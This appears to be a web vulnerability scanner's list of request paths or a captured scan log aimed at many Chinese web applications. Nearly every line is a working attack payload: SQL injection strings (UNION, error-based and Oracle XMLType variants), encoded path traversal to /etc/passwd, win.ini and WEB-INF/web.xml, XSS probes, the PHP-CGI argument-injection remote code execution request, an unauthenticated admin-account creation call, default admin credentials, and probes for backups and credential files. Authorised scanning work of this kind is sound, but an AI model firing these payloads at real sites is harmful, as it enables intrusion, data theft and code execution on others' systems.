/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/index.php?m=register&c=ajax_reg
/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
/nicknamelogin.jsp
/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
/index.php?m=register&c=ajax_reg
/inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
/ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
/?q=node&destination=node
/UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
/jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
/govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
/down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
/api/CheckMemberLogin.ashx?type=mobileisexist
/comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
/LoginCheck.aspx
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
/Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
/show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
/NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
/NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
/NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
/NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
/zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
/AdminP
/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
/public/download.asp?filename=../login2.asp/
/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
/API/DownloadProducts.ashx
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
/ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
/MShop/Partial/SuppLogo
/ShoppingHandler.aspx
/bq/Data/BIData.zip
/jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
/vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
/cms/voteManager/voteaction.jsp
/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/ShopManage.aspx
/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/SNS/Product/WaterfallProductListData
/ProSales/GetListCate
/jphoto/jphoto/sys/member/opr_export.jsp
/JwGl/jxjh/JxjhXGBc.asp
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
/defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
/cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
/login.asp
/search.php
/LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
/jwgl/jxjh/jxjha.asp
/jwgl/jcxx/savetofile.asp
/public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
/edoas2/edoas2_test.jsp
/Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
/celive/live/header.php
/SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
/skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
/RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
/m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
/BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
/plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
/admin/admin_database.aspx
/flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
/video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
/blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
/?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
/search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
/model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
/cctrl/backup/index.php
/cctrl/admin/purview/purview.php
/data_Xbaby/gdjm133950.mdb
/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/upfile.asp
/admin/upfile_yqhy.asp
/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
/FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
/VIEWGOOD/ADI/portal/UserDataSync.aspx
/SPM/Pc/Content/Request.aspx?action=name_check
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/include/upload.asp
/TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
/TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
/products.asp
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/product_view.asp
/system/database/data.mdb
/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
/manage/CHKLOGIN.ASP
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
/search.asp
/onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
/db1/%23kepu.mdb
/upfile.asp
/upfile2.asp
/upfile3.asp
/data/xinfang.mdb
/VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/WS/WebServiceBase.asmx/GetXMLList
/WS/WebService.asmx/GetFile
/WS/WebService.asmx/GetFileContent
/WS/WebService.asmx
/bos/desktop/ajax/EcAjax.aspx
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
/ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/interface/ipsconnect/ipsconnect.php
/templates/
/service/local/outreach/welcome/nexusSpaces.css
/phpRedisAdmin/?overview
/?overview
/index.html#/dashboard/file/logstash.json
/
/index.php/weblinks-categories?id=just_test
/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/oxoxoxoxoxoxox.com
/oxoxoxoxoxoxox.com/
/api/xmlrpc
/wwwroot.rar
/wwwroot.zip
/wwwroot.tar.gz
/web.rar
/www.rar
/www.zip
/www.tar.gz
/web.zip
/crossdomain.xml
/webscan_test.txt
/phpinfo.php
/info.php
/test.php
/shop.php?ac=view&shopid=1-cfreer
/wp-includes/registration-functions.php
/wp-includes/registration.php
/
/
/NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
/pass.txt
/passwd
/password.txt
/passwords.txt
/users.txt
/users.ini
/admin.cfg
/install.log
/database.inc
/common.inc
/db.inc
/connect.inc
/conn.inc
/sql.inc
/.bash_history
/.bashrc
/Web.config
/Global.asax
/Global.asa
/Global.asax.cs
/data.mdb
/domcfg.nsf
/names.nsf
/log.nsf
/domlog.nsf
/.rediscli_history
/data/%23data.mdb
/config.inc.php.bak
/config/config_ucenter.php.bak
/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/data/common.inc.php.bak
/wp-config.php.bak
/WEB-INF/database.properties
/
/robots.txt
/
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/
/nevercouldexistfilenosec
/nevercouldexistfilewebsec
/nevercouldexistfilenosec.aspx
/nevercouldexistfilewebsec.aspx
/nevercouldexistfilenosec.shtml
/nevercouldexistfilewebsec.shtml
/nevercouldexistfilenosec/
/nevercouldexistfilewebsec/
/nevercouldexistfilenosec.zip
/nevercouldexistfilewebsec.zip
/nevercouldexistfilenosec.php
/nevercouldexistfilewebsec.php
/nevercouldexistfilenosec.bak
/nevercouldexistfilewebsec.bak
/nevercouldexistfilenosec.rar
/nevercouldexistfilewebsec.rar
/
/wp-admin
/admin.php
/
/dede/
/administrator/
/user
/jsky_web_scanner_test_file.txt
/TRACE_test
/nosec_Web_Scanner_Test.dll
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/TRACK_test
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/_vti_bin/_vti_adm/admin.dll
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/_vti_bin/_vti_aut/author.dll
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/_vti_bin/shtml.exe?_vti_rpc
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/server-info
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/server-status
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/jmx-console/
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/web-console/
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/webscan360noThisFile*~1*/.aspx
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/.../.../.../.../.../.../.../.../windows/win.ini
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/phpMyAdmin/show_config_errors.php
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
/phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
/xampp/index.php
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/etc/passwd
/etc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/?search=just_test_not_find_href
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/$
